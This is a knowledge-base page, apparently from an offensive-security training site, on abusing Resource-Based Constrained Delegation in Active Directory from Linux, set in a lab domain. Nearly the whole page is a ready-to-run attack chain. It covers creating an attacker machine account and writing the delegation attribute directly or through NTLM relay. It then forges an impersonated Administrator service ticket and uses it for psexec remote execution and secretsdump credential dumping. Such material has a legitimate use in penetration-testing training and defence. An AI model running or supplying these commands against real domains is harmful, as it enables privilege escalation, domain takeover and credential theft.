Operator On The Wire
← Back to Knowledge Base
OOTW / Chapter IV - Active Directory / 03. Kerberos / Delegation / RBCD

Linux

RBCD is configured on the target computer. We need write access to msDS-AllowedToActOnBehalfOfOtherIdentity on the target and control of a principal with an SPN, usually a machine account we create.

Check machine account quota

ldapsearch -LLL -x -H ldap://10.10.10.200 -D "ootw.local\\student" -w 'student' -b "DC=ootw,DC=local" '(objectClass=domainDNS)' ms-DS-MachineAccountQuota

Create controlled machine account

addcomputer.py -computer-name 'ATTACKER01$' -computer-pass 'Password123!' -dc-ip 10.10.10.200 ootw.local/student:'student'

Set RBCD with Impacket-style script

rbcd.py -delegate-from 'ATTACKER01$' -delegate-to 'TARGET01$' -dc-ip 10.10.10.200 -action write ootw.local/student:'student'

Set RBCD through relay

ntlmrelayx.py -t ldaps://10.10.10.200 --delegate-access --escalate-user 'ATTACKER01$' -smb2support

Request delegated service ticket

getST.py -spn 'cifs/target01.ootw.local' -impersonate Administrator -dc-ip 10.10.10.200 'ootw.local/ATTACKER01$:Password123!'
export KRB5CCNAME=Administrator.ccache
smbclient -k //target01.ootw.local/C$

Use the ticket

psexec.py -k -no-pass ootw.local/Administrator@target01.ootw.local -dc-ip 10.10.10.200
secretsdump.py -k -no-pass ootw.local/Administrator@target01.ootw.local -dc-ip 10.10.10.200
nxc smb target01.ootw.local --use-kcache

Alternative SPNs

getST.py -spn 'ldap/dc01.ootw.local' -impersonate Administrator -dc-ip 10.10.10.200 'ootw.local/ATTACKER01$:Password123!'
getST.py -spn 'http/target01.ootw.local' -altservice 'wsman/target01.ootw.local' -impersonate Administrator -dc-ip 10.10.10.200 'ootw.local/ATTACKER01$:Password123!'

Cleanup

rbcd.py -delegate-from 'ATTACKER01$' -delegate-to 'TARGET01$' -dc-ip 10.10.10.200 -action remove ootw.local/student:'student'

Notes

The target object is the object being modified. The attacker-controlled machine is only the principal being allowed to act on behalf of users to the target.

RBCD fails if the delegating principal has no SPN. Machine accounts are convenient because they naturally have service principals and can usually be created by standard users when MachineAccountQuota is still at the default value.